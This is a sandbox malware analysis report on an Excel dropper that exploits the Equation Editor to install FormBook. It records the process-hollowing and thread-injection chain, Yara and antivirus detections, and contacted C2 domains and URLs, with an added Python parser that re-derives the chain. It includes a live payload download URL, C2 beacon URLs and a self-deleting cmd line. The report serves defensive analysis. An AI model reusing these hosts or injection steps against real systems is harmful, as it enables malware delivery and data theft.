Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.216 80
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1E0000
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2347303435.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
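The injection chain above (EQNEDT32.EXE drops and starts vbc.exe, vbc.exe starts RegAsm.exe and writes into it, RegAsm.exe queues an APC in explorer.exe and unmaps the image of rundll32.exe, explorer.exe then talks to the C2 hosts) is what the Sigma and behaviour signatures in this report key on. The following Python is an added example, not part of the Joe Sandbox report or its engine: it re-derives those findings from behaviour rows written in the report's own "Source: ... | action: detail" shape. The rows in SAMPLE_ROWS are constructed to mirror the report's rows, and the function names, the list of "injection" actions and the chain-walking logic are this example's own simplification, not the sandbox's rules.

```python
"""Re-derive the report's process-chain findings from report-style behaviour rows.

Added example, not part of the Joe Sandbox report. SAMPLE_ROWS is constructed
to mirror the report's own rows; rule names and logic are this example's own.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample rows, one event per line, in the report's row format.
SAMPLE_ROWS = r"""
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\Public\vbc.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1E0000
Source: C:\Windows\explorer.exe | Network Connect: 67.227.214.78 80
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
"""

ROW_RE = re.compile(r"^Source: (?P<src>.+?) \| (?P<action>[^:|]+): (?P<detail>.*)$")

# Report actions that mean "source placed code or control into target", each
# with a pattern that pulls the target executable out of the detail cell.
INJECTION_ACTIONS = {
    "Process created": re.compile(r"^(?P<target>.+?\.exe)\b", re.I),
    "Memory written": re.compile(r"^(?P<target>.+?) base: ", re.I),
    "Thread APC queued": re.compile(r"^target process: (?P<target>.+)$", re.I),
    "Section unmapped": re.compile(r"^(?P<target>.+?) base address: ", re.I),
}


def parse_rows(text):
    """Turn report-style lines into {src, action, detail} dicts; skip non-rows."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def basename(path):
    """Lower-cased file name of a Windows path, quotes stripped."""
    return PureWindowsPath(path.strip().strip("'")).name.lower()


def injection_edges(events):
    """(source exe, target exe, action) for every create/write/APC/unmap row."""
    edges = []
    for ev in events:
        pat = INJECTION_ACTIONS.get(ev["action"])
        m = pat.match(ev["detail"]) if pat else None
        if m:
            edges.append((basename(ev["src"]), basename(m.group("target")), ev["action"]))
    return edges


def hollowing_candidates(events):
    """Pairs where the parent spawned the child and then wrote into it or
    unmapped its image: the report's vbc.exe -> RegAsm.exe pattern."""
    by_pair = defaultdict(set)
    for src, dst, action in injection_edges(events):
        by_pair[(src, dst)].add(action)
    return sorted(pair for pair, acts in by_pair.items()
                  if "Process created" in acts and acts & {"Memory written", "Section unmapped"})


def injection_chain(events, start):
    """Depth-first walk over injection edges from `start`, first-seen order."""
    succ = defaultdict(list)
    for src, dst, _ in injection_edges(events):
        if dst not in succ[src]:
            succ[src].append(dst)
    chain, stack = [], [start.lower()]
    while stack:
        node = stack.pop()
        if node not in chain:
            chain.append(node)
            stack.extend(reversed(succ[node]))
    return chain


def office_exploit_children(events):
    """Equation Editor has no business spawning processes or writing files:
    the 'Droppers Exploiting CVE-2017-11882' / 'File Dropped By EQNEDT32EXE' idea."""
    return [(ev["action"], ev["detail"]) for ev in events
            if basename(ev["src"]) == "eqnedt32.exe"
            and ev["action"] in ("Process created", "File created")]


def system_process_network(events):
    """explorer.exe opening TCP connections: 'System process connects to network'."""
    hits = []
    for ev in events:
        if ev["action"] == "Network Connect" and basename(ev["src"]) == "explorer.exe":
            ip, port = ev["detail"].split()
            hits.append((ip, int(port)))
    return hits


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    print("chain:", " -> ".join(injection_chain(evs, "EQNEDT32.EXE")))
    print("hollowing:", hollowing_candidates(evs))
    print("eqnedt32 children:", office_exploit_children(evs))
    print("explorer.exe connects:", system_process_network(evs))
```

Two caveats when porting this to real telemetry. The "Process created" rows with source "unknown" earlier in the report show that the sandbox could not attribute the parent for rundll32.exe, so a chain walk over creation events alone would stop at RegAsm.exe; the APC and section-unmap rows are what tie explorer.exe and rundll32.exe into the chain. And the write target 7EFDE008 is copied from the report: on a Windows 7 x64 guest the PEB of a WoW64 process commonly sits at 0x7EFDE000, so a write at PEB+0x08 is consistent with overwriting ImageBaseAddress, the usual hollowing step before NtResumeThread, but the report itself does not state that interpretation.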

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed here per tactic (one column of the original grid per line). Entries followed by digits in brackets carry the signature-count markers the report attaches to techniques it observed; the remaining entries are the unmarked cells of the matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Shared Modules [1]; Exploitation for Client Execution [13]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Masquerading [111]; Virtualization/Sandbox Evasion [3]; Disable or Modify Tools [1]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [41]; Rundll32 [1]; Software Packing [3]; File Deletion [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery [221]; Virtualization/Sandbox Evasion [3]; Process Discovery [2]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [112]; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [12]; Non-Application Layer Protocol [2]; Application Layer Protocol [22]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Behavior Graph ID: 321137; Sample: Order List.xlsx; Start date: 20/11/2020; Architecture: WINDOWS; Score: 100
Sample-level DNS: www.tnicholson.design
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 12 other signatures

Process tree recovered from the graph:
- EXCEL.EXE (started)
  - dropped: C:\Users\user\Desktop\~$Order List.xlsx (data)
- EQNEDT32.EXE (started)
  - network: 198.23.212.188 port 80 from local port 49165 (AS-COLOCROSSINGUS, United States)
  - dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
  - signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  - started vbc.exe
    - signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    - started RegAsm.exe
      - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      - injected explorer.exe
        - network: www.the-trinity-project.com 185.119.173.57 port 80 from local port 49171 (UKWEB-EQXGB, United Kingdom); californiapropiedades.com 67.227.214.78 port 80 from local port 49169 (LIQUIDWEBUS, United States); 13 other IPs or domains
        - signature: System process connects to network (likely due to code injection or exploit)
        - started rundll32.exe
          - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          - started cmd.exe

Screenshots

This section contains all screenshots as thumbnails, including those not shown in the slideshow (images not reproduced in this text version).

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Order List.xlsx | 31% | ReversingLabs | Document-Word.Exploit.CVE-2017-11882

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 27% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\Public\vbc.exe | 27% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.vbc.exe.49e0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner
teelinkz.com | 1% | Virustotal
alloutdoorspeaker.com | 0% | Virustotal
www.pornfilm3d.com | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.teelinkz.com/o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== | 0% | Avira URL Cloud | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://www.natcandy.com/o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== | 0% | Avira URL Cloud | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://198.23.212.188/reg/vbc.exe | 100% | Avira URL Cloud | malware
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | Avira URL Cloud | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://www.pornfilm3d.com/o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA==0%Avira URL Cloudsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
teelinkz.com | 34.102.136.180 | true | true | - | unknown
alloutdoorspeaker.com | 137.59.52.234 | true | true | - | unknown
crimson.school | 34.102.136.180 | true | true | - | unknown
parkingpage.namecheap.com | 198.54.117.216 | true | false | - | high
www.pornfilm3d.com | 104.24.122.89 | true | true | - | unknown
californiapropiedades.com | 67.227.214.78 | true | true | - | unknown
www.the-trinity-project.com | 185.119.173.57 | true | true | - | unknown
www.tnicholson.design | 65.254.250.119 | true | false | - | unknown
www.natcandy.com | unknown | unknown | true | - | unknown
www.nanox.ltd | unknown | unknown | true | - | unknown
www.alloutdoorspeaker.com | unknown | unknown | true | - | unknown
www.teelinkz.com | unknown | unknown | true | - | unknown
www.heritagediscovery.info | unknown | unknown | true | - | unknown
www.crimson.school | unknown | unknown | true | - | unknown
www.californiapropiedades.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.teelinkz.com/o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== | true | Avira URL Cloud: safe | unknown
http://www.natcandy.com/o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== | true | Avira URL Cloud: safe | unknown
http://198.23.212.188/reg/vbc.exe | true | Avira URL Cloud: malware | unknown
http://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J | true | Avira URL Cloud: safe | unknown
http://www.pornfilm3d.com/o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.ebay.de/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.mtv.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2145875175.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://rover.ebay.com | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.ebay.in/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://%s.com | explorer.exe, 00000006.00000000.2159393395.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | low
http://msk.afisha.ru/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.rediff.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmp | false | - | high
http://www.ya.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.naver.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.google.ru/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.daum.net/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.naver.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.clarin.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://buscar.ozu.es/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://kr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.about.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://busca.igbusca.com.br/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.ask.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.priceminister.com/favicon.ico | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.cjmall.com/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.centrum.cz/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://suche.t-online.de/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.google.it/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://search.auction.co.kr/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.ceneo.pl/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
http://www.amazon.de/ | explorer.exe, 00000006.00000000.2159648590.000000000A3E9000.00000008.00000001.sdmp | false | - | high
